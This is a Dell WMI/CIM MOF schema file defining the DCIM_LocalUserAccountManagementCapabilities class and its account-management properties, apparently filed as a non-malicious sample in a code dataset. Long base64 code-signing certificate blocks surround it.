# b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB
# 9oMvJmpUXSLBAAEAAAH2MCIEIFraBgk4xXajMAI68rUQCySUOKGDReEAQUOAuvhI
# wwAlMA0GCSqGSIb3DQEBCwUABIICADsdf0qmpucTtNQT+RSCAZmeyIwRGaQiIVJy
# jmUv0yuI+57OAJ0Q8CIm3mdqcgeWWngkQ8pp5Cia2peOP/C/5hPJWm9zGyGvCv/M
# QnSKDcrrjNmQz6nYitxQ6Z25mMu3nEoo+Ivc8tc9uPlSPKzYK7OSrOREedy7pTKJ
# EvGcyUSU26+YGv8gSL1OO5pMIBdL1lSIqf2zMvr6EwgP+ValyPwIV+QN1M6eXdsj
# Yb6G+s2ZZWRDlFiJFL2VwobVsN+MK2CWGNQQnRof+8K1DNdITYcgMa+vnAwuj4Wh
# jBHgSQuLnHemBmqQyNRI7KVuwOEBgsWab9DsGooAG5jAmOg3HXiVVpz1Kq70wiHc
# 5yV8/WAnHNia54DTqxgcmR/fpLDfghHi7q9cqKreLgb1qHvzUOLJ857dGp7HwD0S
# VXWgorAbDyIAfHRvSbkjqIRjNrjZHUmoJuYC6Otm79m9t+uEuCTIoDwayNJZvECW
# RZ443oteMaPe0IZCyl+GavTdEcDt7Y4yNX8aeU2CBPgJKCaO/CRN/IIkQNf743E/
# eZBF9NeLwCzNzZQziz3bgr6rxdyhR00EE7igHb5BCkuKLTKMyGLvK1hCcubZ7xiz
# BJfrHVgmt3cxiv6bwzvg5ize48g7klowlUso0S4OZCbykiMa305MPvxMKi2aLnY+
# DHLXcNj3
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_0_86.ps1
|
sample_0_86.ps1
|
// Copyright (c) 2016 Dell Inc. or its subsidiaries. All Rights Reserved.
// ==================================================================
// DCIM_LocalUserAccountManagementCapabilities
// ==================================================================
[ dynamic, provider("dcismprovider"),
Description (
"DCIM_LocalUserAccountManagementCapabilities is a derivation of "
"DCIM_AccountManagementCapabilities.")
]
class DCIM_LocalUserAccountManagementCapabilities : DCIM_AccountManagementCapabilities
{
[
Description ("A unique identifier for the instance."),
Key,
Override ("InstanceID")
]
string InstanceID;
[
Description ("Boolean indicating whether the ElementName can be modified."),
Mappingstrings { "FC-SWAPI.INCITS-T11|SWAPI_UNIT_CONFIG_CAPS_T|EditName" },
Modelcorrespondence { "CIM_ManagedElement.ElementName" },
Override ("ElementNameEditSupported"),
Required
]
boolean ElementNameEditSupported;
[
Description ("The user-friendly name for the class instance. This value does not have to be unique within its namespace."),
Override ("ElementName"),
Required
]
string ElementName;
[
Description ("Maximum supported ElementName length."),
Mappingstrings { "FC-SWAPI.INCITS-T11|SWAPI_UNIT_CONFIG_CAPS_T|MaxNameChars" },
Maxvalue ("256"),
Modelcorrespondence { "CIM_FCSwitchCapabilities.ElementNameEditSupported","CIM_EnabledLogicalElementCapabilities.ElementNameMask" },
Override ("MaxElementNameLen"),
Required
]
uint16 MaxElementNameLen;
[
Description ("OperationsSupported describes the type of operations that are supported for an Account associated with the AccountManagementService. \"Create\" indicates the AccountManagementService may be used to create new accounts. \"Modify\" indicates that the associated Accounts may be modified. \"Delete\" indicates that associated Accounts may be deleted."),
Override ("OperationsSupported[]"),
Required,
Valuemap { "2", "3", "4", "5", "6", "7", "8", "9", "10" },
Values { "Create", "Modify", "Delete", "CreateUserContact", "CreateUserContactByIdentity",
"ModifyUserContact", "DeleteUserContact", "GetAccount", "GetUserContact" }
]
uint16 OperationsSupported[];
[
Description ("An array representing the supported authentication method."),
Required,
Valuemap { "0", "1", "2", "3", "4" },
Values { "Normal", "SmartCard without CRL", "SmartCard with CRL", "biometrics without CRL",
"biometrics with CRL" }
]
uint16 SupportedAuthenticationMethod[];
};
/* SIG # Begin signature block */
/* MIItDgYJKoZIhvcNAQcCoIIs/zCCLPsCAQExDzANBglghkgBZQMEAgEFADB5Bgor */
/* BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG */
/* KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCB/mKBE3VO2msdY */
/* 4/mXUmUWn5RFOqvox+RcgXlr9XOOZ6CCEmMwggXfMIIEx6ADAgECAhBOQOQ3VO3m */
/* jAAAAABR05R/MA0GCSqGSIb3DQEBCwUAMIG+MQswCQYDVQQGEwJVUzEWMBQGA1UE */
/* ChMNRW50cnVzdCwgSW5jLjEoMCYGA1UECxMfU2VlIHd3dy5lbnRydXN0Lm5ldC9s */
/* ZWdhbC10ZXJtczE5MDcGA1UECxMwKGMpIDIwMDkgRW50cnVzdCwgSW5jLiAtIGZv */
/* ciBhdXRob3JpemVkIHVzZSBvbmx5MTIwMAYDVQQDEylFbnRydXN0IFJvb3QgQ2Vy */
/* dGlmaWNhdGlvbiBBdXRob3JpdHkgLSBHMjAeFw0yMTA1MDcxNTQzNDVaFw0zMDEx */
/* MDcxNjEzNDVaMGkxCzAJBgNVBAYTAlVTMRYwFAYDVQQKDA1FbnRydXN0LCBJbmMu */
/* MUIwQAYDVQQDDDlFbnRydXN0IENvZGUgU2lnbmluZyBSb290IENlcnRpZmljYXRp */
/* b24gQXV0aG9yaXR5IC0gQ1NCUjEwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIK */
/* AoICAQCngY/3FEW2YkPy2K7TJV5IT1G/xX2fUBw10dZ+YSqUGW0nRqSmGl33VFFq */
/* gCLGqGZ1TVSDyV5oG6v2W2Swra0gvVTvRmttAudFrnX2joq5Mi6LuHccUk15iF+l */
/* OhjJUCyXJy2/2gB9Y3/vMuxGh2Pbmp/DWiE2e/mb1cqgbnIs/OHxnnBNCFYVb5Cr */
/* +0i6udfBgniFZS5/tcnA4hS3NxFBBuKK4Kj25X62eAUBw2DtTwdBLgoTSeOQm3/d */
/* vfqsv2RR0VybtPVc51z/O5uloBrXfQmywrf/bhy8yH3m6Sv8crMU6UpVEoScRCV1 */
/* HfYq8E+lID1oJethl3wP5bY9867DwRG8G47M4EcwXkIAhnHjWKwGymUfe5SmS1dn */
/* DH5erXhnW1XjXuvH2OxMbobL89z4n4eqclgSD32m+PhCOTs8LOQyTUmM4OEAwjig */
/* nPqEPkHcblauxhpb9GdoBQHNG7+uh7ydU/Yu6LZr5JnexU+HWKjSZR7IH9Vybu5Z */
/* HFc7CXKd18q3kMbNe0WSkUIDTH0/yvKquMIOhvMQn0YupGaGaFpoGHApOBGAYGuK */
/* Q6NzbOOzazf/5p1nAZKG3y9I0ftQYNVc/iHTAUJj/u9wtBfAj6ju08FLXxLq/f0u */
/* DodEYOOp9MIYo+P9zgyEIg3zp3jak/PbOM+5LzPG/wc8Xr5F0wIDAQABo4IBKzCC */
/* AScwDgYDVR0PAQH/BAQDAgGGMBIGA1UdEwEB/wQIMAYBAf8CAQEwHQYDVR0lBBYw */
/* FAYIKwYBBQUHAwMGCCsGAQUFBwMIMDsGA1UdIAQ0MDIwMAYEVR0gADAoMCYGCCsG */
/* AQUFBwIBFhpodHRwOi8vd3d3LmVudHJ1c3QubmV0L3JwYTAzBggrBgEFBQcBAQQn */
/* MCUwIwYIKwYBBQUHMAGGF2h0dHA6Ly9vY3NwLmVudHJ1c3QubmV0MDAGA1UdHwQp */
/* MCcwJaAjoCGGH2h0dHA6Ly9jcmwuZW50cnVzdC5uZXQvZzJjYS5jcmwwHQYDVR0O */
/* BBYEFIK61j2Xzp/PceiSN6/9s7VpNVfPMB8GA1UdIwQYMBaAFGpyJnrQHu995ztp */
/* UdRsjZ+QEmarMA0GCSqGSIb3DQEBCwUAA4IBAQAfXkEEtoNwJFMsVXMdZTrA7LR7 */
/* BJheWTgTCaRZlEJeUL9PbG4lIJCTWEAN9Rm0Yu4kXsIBWBUCHRAJb6jU+5J+Nzg+ */
/* LxR9jx1DNmSzZhNfFMylcfdbIUvGl77clfxwfREc0yHd0CQ5KcX+Chqlz3t57jpv */
/* 3ty/6RHdFoMI0yyNf02oFHkvBWFSOOtg8xRofcuyiq3AlFzkJg4sit1Gw87kVlHF */
/* VuOFuE2bRXKLB/GK+0m4X9HyloFdaVIk8Qgj0tYjD+uL136LwZNr+vFie1jpUJuX */
/* bheIDeHGQ5jXgWG2hZ1H7LGerj8gO0Od2KIc4NR8CMKvdgb4YmZ6tvf6yK81MIIG */
/* CDCCA/CgAwIBAgIQBu9mzEaGqLK0hNoZKy1rYTANBgkqhkiG9w0BAQ0FADBPMQsw */
/* CQYDVQQGEwJVUzEWMBQGA1UEChMNRW50cnVzdCwgSW5jLjEoMCYGA1UEAxMfRW50 */
/* cnVzdCBDb2RlIFNpZ25pbmcgQ0EgLSBPVkNTMjAeFw0yNDA0MTkwOTE2MDlaFw0y */
/* NTA1MTIwOTE2MDhaMIGEMQswCQYDVQQGEwJVUzEOMAwGA1UECBMFVGV4YXMxEzAR */
/* BgNVBAcTClJvdW5kIFJvY2sxEjAQBgNVBAoTCURlbGwgSW5jLjEoMCYGA1UECxMf */
/* U2VydmVyIFN5c3RlbXMgTWdtdCBFbmdpbmVlcmluZzESMBAGA1UEAxMJRGVsbCBJ */
/* bmMuMIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAvFatHoJS1lbvBD4U */
/* x/jt6hrhOHlGpntV/TPJbKwAdvG6SCT6MfdFasEGShyzypfx8adv3v+sFWo84yYB */
/* GqnqH/Kkj48BTKNREXjN3x/jLZrv+rVRQJYG79us7u3vQVSBX0ds0Jcd9f7u2REE */
/* aLBKrd7ZwxmsHoiAaqKYBm8nMo4kmH4xOw6cOXxUW6mkYxNQxn60nxV5A2ZJvUKn */
/* YvanuULo5jGrl+t2A5jInOLyxSmNU62DdLbyhtE3B6cEhe5yQ54hi7d6c5IM2fNH */
/* FNrQkRavAWUyAxPPBpTSsR0g/IkNymbNPCTjgvDQOIJBcMp0C+q158RIBiE+IMwq */
/* QGi7aUvUUhzTQG9NcSDQan3hMmYfevU3RLQMw4OcoGIT/jOSYmgtcLHiB6lnOG/h */
/* iJ8EsQgW1s2yJ7vG2Fo/IHvQjbfFxefO+gluw4UjcLZgIqACIlFNYGaq4rzKtTeF */
/* 1NNy6DjjbJV2nt/JlD68YlFg0pU9rGDKglZFWvfWiLId8IJnAgMBAAGjggEoMIIB */
/* JDAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRFrXrMchlvXUnwqKV0rQOPRSgzqzAf */
/* BgNVHSMEGDAWgBTvn7p5sHPyJR54nANSnBtThN6N7TBnBggrBgEFBQcBAQRbMFkw */
/* IwYIKwYBBQUHMAGGF2h0dHA6Ly9vY3NwLmVudHJ1c3QubmV0MDIGCCsGAQUFBzAC */
/* hiZodHRwOi8vYWlhLmVudHJ1c3QubmV0L292Y3MyLWNoYWluLnA3YzAxBgNVHR8E */
/* KjAoMCagJKAihiBodHRwOi8vY3JsLmVudHJ1c3QubmV0L292Y3MyLmNybDAOBgNV */
/* HQ8BAf8EBAMCB4AwEwYDVR0lBAwwCgYIKwYBBQUHAwMwEwYDVR0gBAwwCjAIBgZn */
/* gQwBBAEwDQYJKoZIhvcNAQENBQADggIBACoeAWs2aV9gf+TF4AGOKc454/E55mVR */
/* Yz42M1ksqASl2j+ulObFIWcuy/paLjWhMSulehEA8Zb+YQ89fR6Y0TgJ0Eh09aK5 */
/* +GARB7q/+a+gRIw7nfrwmjMkXAwL+9lmbc1X64fEUuKY2NVdksjKC7xRKNMb5i50 */
/* NQyVN9neCJKIVSQDiBMXGgtDkAqPe1sH7/NGGQZKCXhIg3f3caq7dr/mZoiVAIOB */
/* XtHr++65DqG61aWyZV5tCfzSvXFvLpL0dbu14gH6gEo5Zvlp226Vk+HKr/cQ2Ynj */
/* /xXw/5UWHvmKwDOAkA/ld64jA4m466aoP2tKse8z1kSa/zw1wRSp0bwPn23gj2IO */
/* NmEG9dM9Lv3c5FH+oBKNuqJ2Vj5viCHVZEcw40UDQqdfboVK+Y1XSkNfa1CUjzCu */
/* Q2J3XMrfVK9ZCecopoCAXzYem7e/G/Md3rTQky2PTf7Z1hgYlqxisPoGEV3nguIg */
/* ooMbBkHbl/4iWAB237woZFlX0imdO5se7el67/nx58CSLYjNmj82Y4cthnFOrwP4 */
/* mUW7zVXlq9sZP9fCcrdrNMUF4KYS2x7/IIgHURKvOTjyT6f+ZRedEfwOlM1D12/l */
/* eL1OX+dPZq5BGGHal3r1xbLdLxHUlMg+IJJk0wmMwmSF3kzbqbMUTaM1FX9x0+E8 */
/* 4YVlsJB1ttLHMIIGcDCCBFigAwIBAgIQce9VdK81VMNaLGn2b0trzTANBgkqhkiG */
/* 9w0BAQ0FADBpMQswCQYDVQQGEwJVUzEWMBQGA1UECgwNRW50cnVzdCwgSW5jLjFC */
/* MEAGA1UEAww5RW50cnVzdCBDb2RlIFNpZ25pbmcgUm9vdCBDZXJ0aWZpY2F0aW9u */
/* IEF1dGhvcml0eSAtIENTQlIxMB4XDTIxMDUwNzE5MjA0NVoXDTQwMTIyOTIzNTkw */
/* MFowTzELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUVudHJ1c3QsIEluYy4xKDAmBgNV */
/* BAMTH0VudHJ1c3QgQ29kZSBTaWduaW5nIENBIC0gT1ZDUzIwggIiMA0GCSqGSIb3 */
/* DQEBAQUAA4ICDwAwggIKAoICAQCemXYXGp5WFwhjLJNNg2GEMzQCttlioN7CDrkg */
/* TMhXnQ/dVFsNDNYB3S9I4ZEJ4dvIFQSCtnvw2NYwOxlxcPuoppf2KV2kDKn0Uz5X */
/* 2wxObvx2218k6apfQ+OT5w7PyiW8xEwwC1oP5gb05W4MmWZYT4NhwnN8XCJvAUXF */
/* D/dAT2RL0BcKqQ4eAi+hj0zyZ1DbPuSfwk8/dOsxpNCU0Jm8MJIJasskzaLYdlLQ */
/* TnWYT2Ra0l6D9FjAXWp1xNg/ZDqLFA3YduHquWvnEXBJEThjE27xxvq9EEU1B+Z2 */
/* FdB1FqrCQ1f+q/5jc0YioLjz5MdwRgn5qTdBmrNLbB9wcqMH9jWSdBFkbvkC1cCS */
/* lfGXWX4N7qIl8nFVuJuNv83urt37DOeuMk5QjaHf0XO/wc5/ddqrv9CtgjjF54jt */
/* om06hhG317DhqIs7DEEXml/kW5jInQCf93PSw+mfBYd5IYPWC+3RzAif4PHFyVi6 */
/* U1/Uh7GLWajSXs1p0D76xDkJr7S17ec8+iKH1nP5F5Vqwxz1VXhf1PoLwFs/jHgV */
/* DlpMOm7lJpjQJ8wg38CGO3qNZUZ+2WFeqfSuPtT8r0XHOrOFBEqLyAlds3sCKFnj */
/* hn2AolhAZmLgOFWDq58pQSa6u+nYZPi2uyhzzRVK155z42ZMsVGdgSOLyIZ3srYs */
/* NyJwIQIDAQABo4IBLDCCASgwEgYDVR0TAQH/BAgwBgEB/wIBADAdBgNVHQ4EFgQU */
/* 75+6ebBz8iUeeJwDUpwbU4Teje0wHwYDVR0jBBgwFoAUgrrWPZfOn89x6JI3r/2z */
/* tWk1V88wMwYIKwYBBQUHAQEEJzAlMCMGCCsGAQUFBzABhhdodHRwOi8vb2NzcC5l */
/* bnRydXN0Lm5ldDAxBgNVHR8EKjAoMCagJKAihiBodHRwOi8vY3JsLmVudHJ1c3Qu */
/* bmV0L2NzYnIxLmNybDAOBgNVHQ8BAf8EBAMCAYYwEwYDVR0lBAwwCgYIKwYBBQUH */
/* AwMwRQYDVR0gBD4wPDAwBgRVHSAAMCgwJgYIKwYBBQUHAgEWGmh0dHA6Ly93d3cu */
/* ZW50cnVzdC5uZXQvcnBhMAgGBmeBDAEEATANBgkqhkiG9w0BAQ0FAAOCAgEAXvOG */
/* mTXBee7wEK/XkkPShdBb4Jig4HFRyRTLUJpgDrAEJkmxz+m6mwih2kNd1G8jorn4 */
/* QMdH/k0BC0iQP8jcarQ+UzUovkBKR4VqHndAzIB/YbQ8T3mo5qOmoH5EhnG/EhuV */
/* gXL3DaXQ3mefxqK48Wr5/P50ZsZk5nk9agNhTksfzCBiywIY7GPtfnE/lroLXmgi */
/* Z+wfwNIFFmaxsqTq/MWVo40SpfWN7xsgzZn35zLzWXEf3ZTmeeVSIxBWKvxZOL+/ */
/* eSWSasf9q2d3cbEEfTWtFME+qPwjF1YIGHzXeiJrkWrMNUVtTzudQ50FuJ3z/DQh */
/* XAQYMlc4NMHKgyNGpogjIcZ+FICrse+7C6wJP+5TkTGz4lREqrV9MDwsI5zoP6NY */
/* 6kAIF6MgX3rADNuq/wMWAw10ZCKalF4wNXYT9dPh4+AHytnqRYhGnFTVEOLzMglA */
/* tudcFzL+zK/rbc9gPHXz7lxgQFUbtVmvciNoTZx0BAwQya9QW6cNZg+W5ZqV4CCi */
/* GtCw7jhJnipnnpGWbJjbxBBtYHwebkjntn6vMwcSce+9lTu+qYPUQn23pzTXX4aR */
/* ta9WWNpVfRe927zNZEEVjTFRBk+0LrKLPZzzTeNYA1TMrIj4UjxOS0YJJRn/Feen */
/* mEYufbrq4+N8//m5GZW+drkNebICURpKyJ+IwkMxghoBMIIZ/QIBATBjME8xCzAJ */
/* BgNVBAYTAlVTMRYwFAYDVQQKEw1FbnRydXN0LCBJbmMuMSgwJgYDVQQDEx9FbnRy */
/* dXN0IENvZGUgU2lnbmluZyBDQSAtIE9WQ1MyAhAG72bMRoaosrSE2hkrLWthMA0G */
/* CWCGSAFlAwQCAQUAoIGsMBkGCSqGSIb3DQEJAzEMBgorBgEEAYI3AgEEMBwGCisG */
/* AQQBgjcCAQsxDjAMBgorBgEEAYI3AgEVMC8GCSqGSIb3DQEJBDEiBCDKEp2erYV9 */
/* gITjz9HmjwZKICm2xK9MvsA+rLIZMs0mMjBABgorBgEEAYI3AgEMMTIwMKAWgBQA */
/* RABlAGwAbAAsACAASQBuAGMALqEWgBRodHRwOi8vd3d3LmRlbGwuY29tIDANBgkq */
/* hkiG9w0BAQEFAASCAYBIZZuL5jxCMBJwEMPU9wjbPCJqJLE6Nt+BYHwL4RM3i1cx */
/* xtuTTpWR4/M4ur8EuhKKoD1LdfY0lSjkaJ/lS6guEZJkfZO9wPeeLXJlp/lpsa00 */
/* NYmD1DHxTG6+mjYYm8N21QOnZqHXakKhKLRzkky7eRM7S9k9MIAoENCXN9PeVw03 */
/* wF4wtY/dB+vE1qWKFCHDDK9MtwuhaWxL3g1nhJCxO+6NnbrSNLFqT+e7noNmzSQQ */
/* /Gtu1cpi7duWA2PF6ImGxFGOR2fSy+8mXExYMIG2krbFbK3S8J8iGKbW5Shbj4ZV */
/* DpGuv5NRQcQNf+8q7da/Zoq6A7cM9N0nlw3AAtrWgoogNHjujPcV5eh8gpgV8bVS */
/* J7PVaGI96TAqvcC21UZdvAwy2P1VxNdh0CW6G2BIA8p/7UG2JED81dMGCYxcRD+0 */
/* S3Hw3ezvWqLFZWa7rG3Rnkx53O2gZwdnfqgR6nUmvfEGCKUyMBOZbSDaV11M6sXs */
/* 9qWHnCvr1QZuqF0NU6ChghdAMIIXPAYKKwYBBAGCNwMDATGCFywwghcoBgkqhkiG */
/* 9w0BBwKgghcZMIIXFQIBAzEPMA0GCWCGSAFlAwQCAQUAMHgGCyqGSIb3DQEJEAEE */
/* oGkEZzBlAgEBBglghkgBhv1sBwEwMTANBglghkgBZQMEAgEFAAQgqklk/NHxKhOc */
/* Dz9vZIMaWJVkV+vc3HAr5u5a5aFfd4cCEQCqDuaxvKzKaezrAjQxMtFqGA8yMDI0 */
/* MDkyMDA3MDExNFqgghMJMIIGwjCCBKqgAwIBAgIQBUSv85SdCDmmv9s/X+VhFjAN */
/* BgkqhkiG9w0BAQsFADBjMQswCQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQs */
/* IEluYy4xOzA5BgNVBAMTMkRpZ2lDZXJ0IFRydXN0ZWQgRzQgUlNBNDA5NiBTSEEy */
/* NTYgVGltZVN0YW1waW5nIENBMB4XDTIzMDcxNDAwMDAwMFoXDTM0MTAxMzIzNTk1 */
/* OVowSDELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDkRpZ2lDZXJ0LCBJbmMuMSAwHgYD */
/* VQQDExdEaWdpQ2VydCBUaW1lc3RhbXAgMjAyMzCCAiIwDQYJKoZIhvcNAQEBBQAD */
/* ggIPADCCAgoCggIBAKNTRYcdg45brD5UsyPgz5/X5dLnXaEOCdwvSKOXejsqnGfc */
/* YhVYwamTEafNqrJq3RApih5iY2nTWJw1cb86l+uUUI8cIOrHmjsvlmbjaedp/lvD */
/* 1isgHMGXlLSlUIHyz8sHpjBoyoNC2vx/CSSUpIIa2mq62DvKXd4ZGIX7ReoNYWyd */
/* /nFexAaaPPDFLnkPG2ZS48jWPl/aQ9OE9dDH9kgtXkV1lnX+3RChG4PBuOZSlbVH */
/* 13gpOWvgeFmX40QrStWVzu8IF+qCZE3/I+PKhu60pCFkcOvV5aDaY7Mu6QXuqvYk */
/* 9R28mxyyt1/f8O52fTGZZUdVnUokL6wrl76f5P17cz4y7lI0+9S769SgLDSb495u */
/* ZBkHNwGRDxy1Uc2qTGaDiGhiu7xBG3gZbeTZD+BYQfvYsSzhUa+0rRUGFOpiCBPT */
/* aR58ZE2dD9/O0V6MqqtQFcmzyrzXxDtoRKOlO0L9c33u3Qr/eTQQfqZcClhMAD6F */
/* aXXHg2TWdc2PEnZWpST618RrIbroHzSYLzrqawGw9/sqhux7UjipmAmhcbJsca8+ */
/* uG+W1eEQE/5hRwqM/vC2x9XH3mwk8L9CgsqgcT2ckpMEtGlwJw1Pt7U20clfCKRw */
/* o+wK8REuZODLIivK8SgTIUlRfgZm0zu++uuRONhRB8qUt+JQofM604qDy0B7AgMB */
/* AAGjggGLMIIBhzAOBgNVHQ8BAf8EBAMCB4AwDAYDVR0TAQH/BAIwADAWBgNVHSUB */
/* Af8EDDAKBggrBgEFBQcDCDAgBgNVHSAEGTAXMAgGBmeBDAEEAjALBglghkgBhv1s */
/* BwEwHwYDVR0jBBgwFoAUuhbZbU2FL3MpdpovdYxqII+eyG8wHQYDVR0OBBYEFKW2 */
/* 7xPn783QZKHVVqllMaPe1eNJMFoGA1UdHwRTMFEwT6BNoEuGSWh0dHA6Ly9jcmwz */
/* LmRpZ2ljZXJ0LmNvbS9EaWdpQ2VydFRydXN0ZWRHNFJTQTQwOTZTSEEyNTZUaW1l */
/* U3RhbXBpbmdDQS5jcmwwgZAGCCsGAQUFBwEBBIGDMIGAMCQGCCsGAQUFBzABhhho */
/* dHRwOi8vb2NzcC5kaWdpY2VydC5jb20wWAYIKwYBBQUHMAKGTGh0dHA6Ly9jYWNl */
/* cnRzLmRpZ2ljZXJ0LmNvbS9EaWdpQ2VydFRydXN0ZWRHNFJTQTQwOTZTSEEyNTZU */
/* aW1lU3RhbXBpbmdDQS5jcnQwDQYJKoZIhvcNAQELBQADggIBAIEa1t6gqbWYF7xw */
/* jU+KPGic2CX/yyzkzepdIpLsjCICqbjPgKjZ5+PF7SaCinEvGN1Ott5s1+FgnCvt */
/* 7T1IjrhrunxdvcJhN2hJd6PrkKoS1yeF844ektrCQDifXcigLiV4JZ0qBXqEKZi2 */
/* V3mP2yZWK7Dzp703DNiYdk9WuVLCtp04qYHnbUFcjGnRuSvExnvPnPp44pMadqJp */
/* ddNQ5EQSviANnqlE0PjlSXcIWiHFtM+YlRpUurm8wWkZus8W8oM3NG6wQSbd3lqX */
/* TzON1I13fXVFoaVYJmoDRd7ZULVQjK9WvUzF4UbFKNOt50MAcN7MmJ4ZiQPq1JE3 */
/* 701S88lgIcRWR+3aEUuMMsOI5ljitts++V+wQtaP4xeR0arAVeOGv6wnLEHQmjNK */
/* qDbUuXKWfpd5OEhfysLcPTLfddY2Z1qJ+Panx+VPNTwAvb6cKmx5AdzaROY63jg7 */
/* B145WPR8czFVoIARyxQMfq68/qTreWWqaNYiyjvrmoI1VygWy2nyMpqy0tg6uLFG */
/* hmu6F/3Ed2wVbK6rr3M66ElGt9V/zLY4wNjsHPW2obhDLN9OTH0eaHDAdwrUAuBc */
/* YLso/zjlUlrWrBciI0707NMX+1Br/wd3H3GXREHJuEbTbDJ8WC9nR2XlG3O2mflr */
/* LAZG70Ee8PBf4NvZrZCARK+AEEGKMIIGrjCCBJagAwIBAgIQBzY3tyRUfNhHrP0o */
/* ZipeWzANBgkqhkiG9w0BAQsFADBiMQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGln */
/* aUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNlcnQuY29tMSEwHwYDVQQDExhE */
/* aWdpQ2VydCBUcnVzdGVkIFJvb3QgRzQwHhcNMjIwMzIzMDAwMDAwWhcNMzcwMzIy */
/* MjM1OTU5WjBjMQswCQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4x */
/* OzA5BgNVBAMTMkRpZ2lDZXJ0IFRydXN0ZWQgRzQgUlNBNDA5NiBTSEEyNTYgVGlt */
/* ZVN0YW1waW5nIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAxoY1 */
/* BkmzwT1ySVFVxyUDxPKRN6mXUaHW0oPRnkyibaCwzIP5WvYRoUQVQl+kiPNo+n3z */
/* nIkLf50fng8zH1ATCyZzlm34V6gCff1DtITaEfFzsbPuK4CEiiIY3+vaPcQXf6sZ */
/* Kz5C3GeO6lE98NZW1OcoLevTsbV15x8GZY2UKdPZ7Gnf2ZCHRgB720RBidx8ald6 */
/* 8Dd5n12sy+iEZLRS8nZH92GDGd1ftFQLIWhuNyG7QKxfst5Kfc71ORJn7w6lY2zk */
/* psUdzTYNXNXmG6jBZHRAp8ByxbpOH7G1WE15/tePc5OsLDnipUjW8LAxE6lXKZYn */
/* LvWHpo9OdhVVJnCYJn+gGkcgQ+NDY4B7dW4nJZCYOjgRs/b2nuY7W+yB3iIU2YIq */
/* x5K/oN7jPqJz+ucfWmyU8lKVEStYdEAoq3NDzt9KoRxrOMUp88qqlnNCaJ+2RrOd */
/* OqPVA+C/8KI8ykLcGEh/FDTP0kyr75s9/g64ZCr6dSgkQe1CvwWcZklSUPRR8zZJ */
/* TYsg0ixXNXkrqPNFYLwjjVj33GHek/45wPmyMKVM1+mYSlg+0wOI/rOP015LdhJR */
/* k8mMDDtbiiKowSYI+RQQEgN9XyO7ZONj4KbhPvbCdLI/Hgl27KtdRnXiYKNYCQEo */
/* AA6EVO7O6V3IXjASvUaetdN2udIOa5kM0jO0zbECAwEAAaOCAV0wggFZMBIGA1Ud */
/* EwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFLoW2W1NhS9zKXaaL3WMaiCPnshvMB8G */
/* A1UdIwQYMBaAFOzX44LScV1kTN8uZz/nupiuHA9PMA4GA1UdDwEB/wQEAwIBhjAT */
/* BgNVHSUEDDAKBggrBgEFBQcDCDB3BggrBgEFBQcBAQRrMGkwJAYIKwYBBQUHMAGG */
/* GGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBBBggrBgEFBQcwAoY1aHR0cDovL2Nh */
/* Y2VydHMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0VHJ1c3RlZFJvb3RHNC5jcnQwQwYD */
/* VR0fBDwwOjA4oDagNIYyaHR0cDovL2NybDMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0 */
/* VHJ1c3RlZFJvb3RHNC5jcmwwIAYDVR0gBBkwFzAIBgZngQwBBAIwCwYJYIZIAYb9 */
/* bAcBMA0GCSqGSIb3DQEBCwUAA4ICAQB9WY7Ak7ZvmKlEIgF+ZtbYIULhsBguEE0T */
/* zzBTzr8Y+8dQXeJLKftwig2qKWn8acHPHQfpPmDI2AvlXFvXbYf6hCAlNDFnzbYS */
/* lm/EUExiHQwIgqgWvalWzxVzjQEiJc6VaT9Hd/tydBTX/6tPiix6q4XNQ1/tYLaq */
/* T5Fmniye4Iqs5f2MvGQmh2ySvZ180HAKfO+ovHVPulr3qRCyXen/KFSJ8NWKcXZl */
/* 2szwcqMj+sAngkSumScbqyQeJsG33irr9p6xeZmBo1aGqwpFyd/EjaDnmPv7pp1y */
/* r8THwcFqcdnGE4AJxLafzYeHJLtPo0m5d2aR8XKc6UsCUqc3fpNTrDsdCEkPlM05 */
/* et3/JWOZJyw9P2un8WbDQc1PtkCbISFA0LcTJM3cHXg65J6t5TRxktcma+Q4c6um */
/* AU+9Pzt4rUyt+8SVe+0KXzM5h0F4ejjpnOHdI/0dKNPH+ejxmF/7K9h+8kaddSwe */
/* Jywm228Vex4Ziza4k9Tm8heZWcpw8De/mADfIBZPJ/tgZxahZrrdVcA6KYawmKAr */
/* 7ZVBtzrVFZgxtGIJDwq9gdkT/r+k0fNX2bwE+oLeMt8EifAAzV3C+dAjfwAL5HYC */
/* JtnwZXZCpimHCUcr5n8apIUP/JiW9lVUKx+A+sDyDivl1vupL0QVSucTDh3bNzga */
/* oSv27dZ8/DCCBY0wggR1oAMCAQICEA6bGI750C3n79tQ4ghAGFowDQYJKoZIhvcN */
/* AQEMBQAwZTELMAkGA1UEBhMCVVMxFTATBgNVBAoTDERpZ2lDZXJ0IEluYzEZMBcG */
/* A1UECxMQd3d3LmRpZ2ljZXJ0LmNvbTEkMCIGA1UEAxMbRGlnaUNlcnQgQXNzdXJl */
/* ZCBJRCBSb290IENBMB4XDTIyMDgwMTAwMDAwMFoXDTMxMTEwOTIzNTk1OVowYjEL */
/* MAkGA1UEBhMCVVMxFTATBgNVBAoTDERpZ2lDZXJ0IEluYzEZMBcGA1UECxMQd3d3 */
/* LmRpZ2ljZXJ0LmNvbTEhMB8GA1UEAxMYRGlnaUNlcnQgVHJ1c3RlZCBSb290IEc0 */
